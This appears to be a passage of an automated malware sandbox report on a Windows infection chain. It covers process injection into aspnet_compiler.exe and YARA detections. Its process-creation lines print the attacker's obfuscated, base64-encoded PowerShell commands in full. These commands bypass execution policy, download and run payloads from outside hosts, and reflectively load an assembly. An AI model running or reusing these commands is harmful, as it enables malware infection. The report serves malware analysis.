Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D245A mov eax, dword ptr fs:[00000030h]	16_2_015D245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0168547F mov eax, dword ptr fs:[00000030h]	16_2_0168547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BB440 mov eax, dword ptr fs:[00000030h]	16_2_015BB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EE443 mov eax, dword ptr fs:[00000030h]	16_2_015EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DA470 mov eax, dword ptr fs:[00000030h]	16_2_015DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DA470 mov eax, dword ptr fs:[00000030h]	16_2_015DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DA470 mov eax, dword ptr fs:[00000030h]	16_2_015DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166F453 mov eax, dword ptr fs:[00000030h]	16_2_0166F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460 mov eax, dword ptr fs:[00000030h]	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460 mov eax, dword ptr fs:[00000030h]	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460 mov eax, dword ptr fs:[00000030h]	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460 mov eax, dword ptr fs:[00000030h]	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1460 mov eax, dword ptr fs:[00000030h]	16_2_015B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CF460 mov eax, dword ptr fs:[00000030h]	16_2_015CF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636420 mov eax, dword ptr fs:[00000030h]	16_2_01636420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D340D mov eax, dword ptr fs:[00000030h]	16_2_015D340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E8402 mov eax, dword ptr fs:[00000030h]	16_2_015E8402

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_3520.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3520.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: C89008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7FE.tmp" "c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rty